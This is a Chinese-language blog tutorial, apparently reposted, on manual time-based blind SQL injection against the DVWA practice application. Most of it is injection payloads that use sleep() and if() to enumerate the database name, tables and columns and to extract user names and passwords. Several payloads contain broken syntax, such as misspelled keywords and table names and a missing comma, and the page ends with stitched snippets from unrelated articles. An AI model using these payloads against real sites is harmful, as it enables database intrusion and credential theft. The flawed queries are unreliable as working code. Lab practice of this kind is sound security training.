時間盲注手注

2021-10-01 08:01:48 字數 1800 閱讀 1008

基於時間的盲注:

時間的概念:使用特定函式讓資料庫去執行,通過自己的設定,來檢視資料庫是否get到我們的請求

函式sleep()設定資料庫的延時或者暫停的時間

函式limit 0,1 限制第乙個的第乙個字元

函式mid 1,1 從第乙個字元開始擷取,只擷取乙個

函式benchmark(引數一,引數二),第一是執行多少次,二是某項操作。

if(exp1,exp2,exp3),如果滿足exp1,那麼執行exp2,否則執行exp3

1、找注入點

通過輸入以下兩行,根據返回的延遲判斷存在字元型注入

1 and sleep(5)#

1』 and sleep(5)#

2、獲取資訊

當前資料庫長度

select * from dvwa.users where user_id=1 and if(length(database())=1,sleep(5),』bye』);

//通過猜測資料庫的長度,如果正確的話,可以看到網頁的響應時間會有5秒

獲取每個字元

select * from dvwa.users where user_id=1 and if(ascii(substring(database(),1,1))=110,sleep(5),』bye』);

//這裡主要是通過從資料庫第乙個字元開始猜測,將資料庫的字元轉化為asicc碼,如果猜解正確就可以明顯的看見網頁的相應的時間為五秒

獲取資料庫中表

select * from dvwa.users where user_id=1 and if(ascii(mid((select distinc table_name from information_schema.colums where table_schema=database() limit 0,1)1,1))=102,sleep(5),』bye』);

//同上。這裡的limit主要的作用是限制輸出得是第乙個表的第乙個字元,mid限制的是從第乙個字元開始擷取,擷取乙個字元

猜解第乙個表的長度

1』 and if(length((select table_name from information_schema.tables where table_schema=『dvwa』 limit 0,1))=9,sleep(5),1)#

//原理類似上面的,用length來乙個個字元的猜解,將字元轉換為ascii來進行回顯

猜解第二個表的長度

1』 and if(length((select table_name from information_schema.tables where table_schema=『dvwa』 limit 1,1))=5,sleep(5),1)#

找有價值的表,users

4、獲取指定表中的字段

select * from dvwa.users where user_id=1 and if(ascii(mid((select distinc columns_name from information_schema.colums where table_schema=database() and table_name=』users』limit 0,1)1,1))=102,sleep(5),』bye』);

5、獲取內容

select * from dvwa.users where user_id=1 and if(ascii(mid((select concat(admin,0x7e,password)from users limit 0,1)1,1))=102,sleep(5),』bye』);

//if(exp1,exp2,exp3),如果滿足exp1,那麼執行exp2,否則執行exp3

mysql 時間盲注 MySQL手注之時間盲注

時間盲注 延遲 沒有任何回顯點 在頁面中輸入任何內容都會返回同乙個頁面內容的 就可以嘗試使用延遲盲注。時間盲注常用的函式 if函式 if condition,a,b 含義 如果condition 成立,執行a,則b substr函式 含義 擷取字串。subster string,start,leng...

布林盲注手注

布林盲注 mid str,1,3 字串擷取 意思就是把str這個字串從第乙個字串開始,擷取前三個顯示 substr 這個函式和上面的用法一樣,也是用來擷取字串的 ord 轉換成ascii碼 length 統計長度 version 是檢視資料庫版本 database 檢視當前資料庫名 user 檢視當...

SQL盲注 時間盲注,dnslog盲注

時間盲注原理 id get id sql select from users where id id limit 0,1 result mysql query sql row mysql fetch array result if row else 存在sql注入漏洞 然而頁面不會回顯資料,也不會回...